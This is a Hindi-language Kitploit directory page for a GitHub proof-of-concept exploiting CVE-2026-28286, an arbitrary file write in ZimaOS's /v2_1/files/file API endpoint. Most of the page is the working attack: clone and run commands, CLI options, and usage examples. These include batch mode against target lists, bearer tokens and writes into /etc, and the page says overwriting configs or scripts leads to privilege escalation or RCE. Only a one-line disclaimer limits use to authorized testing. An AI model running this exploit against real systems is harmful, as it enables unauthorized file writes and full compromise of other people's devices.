Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

CVE-2026-28286 के लिए PoC और सत्यापन टूलकिट, जो ZimaOS में एक मनमाना फ़ाइल लेखन भेद्यता है, जो इच्छित निर्देशिकाओं के बाहर फ़ाइलें लिखने के लिए API मिसकॉन्फ़िगरेशन का शोषण करती है।

रिपॉजिटरी देखेंवेबसाइट
214 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-28286 — ZimaOS मनमाना फ़ाइल लेखन

API मिसकॉन्फ़िगरेशन → मनमाना फ़ाइल लेखन → संभावित सिस्टम समझौता

⚡ TL;DR

  • एंडपॉइंट: /v2_1/files/file
  • समस्या: कोई पथ सत्यापन नहीं
  • प्रभाव: इच्छित निर्देशिका के बाहर मनमाना फ़ाइल लेखन
  • गंभीरता: 🔴 क्रिटिकल

🧪 त्वरित आरंभ

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ CLI उपयोग

आप निम्न का उपयोग करके सभी उपलब्ध विकल्प देख सकते हैं:

root@kitploit:~
python poc.py -h

📌 उपलब्ध विकल्प

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            show help message and exit
  -u, --url URL         Single target URL
  -t, --targets TARGETS Targets file (batch mode)
  -p, --path PATH       Custom file path (default: /tmp)
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --token TOKEN         Bearer authentication token
  -n, --attempts        Number of attempts
  --delay               Delay between batch requests (seconds)

🚀 उपयोग उदाहरण

▶️ 1. इंटरैक्टिव मोड

root@kitploit:~
python poc.py

▶️ 2. एकल लक्ष्य

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. कस्टम पथ

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. संवेदनशील पथ को लक्षित करें (लैब परीक्षण)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. एकाधिक प्रयास

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. प्रॉक्सी का उपयोग (Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. बैच मोड

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. विलंब के साथ बैच मोड

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. फुल पावर मोड (सभी विकल्प)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 टिप

Burp Suite के साथ प्रॉक्सी मोड का उपयोग करें:

  • अनुरोधों का निरीक्षण करने के लिए
  • पेलोड संशोधित करने के लिए
  • बैकएंड व्यवहार की पुष्टि करने के लिए

🧠 तकनीकी विवरण

बैकएंड फ़ाइलसिस्टम सीमाओं को लागू करने में विफल रहता है:

  • ❌ कोई पथ कैनोनिकलाइज़ेशन नहीं
  • ❌ कोई बेस निर्देशिका प्रतिबंध नहीं
  • ❌ उपयोगकर्ता-नियंत्रित निरपेक्ष पथ

यह निम्न में लिखने की अनुमति देता है:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 प्रभाव

root@kitploit:~
मनमाना फ़ाइल लेखन
        ↓
कॉन्फ़िग / स्क्रिप्ट अधिलेखित करें
        ↓
विशेषाधिकार वृद्धि / RCE


🎥 डेमो

image

📁 उदाहरण आउटपुट

root@kitploit:~
[✔] CONFIRMED vulnerable (LISTING_SUCCESS)
Path: /tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ समर्थन

यदि आपको यह उपयोगी लगा, तो एक स्टार ⭐ देने पर विचार करें यह अधिक शोधकर्ताओं को इस कार्य को खोजने में मदद करता है।


⚠️ अस्वीकरण

केवल अधिकृत परीक्षण के लिए।

टूल डाउनलोड करें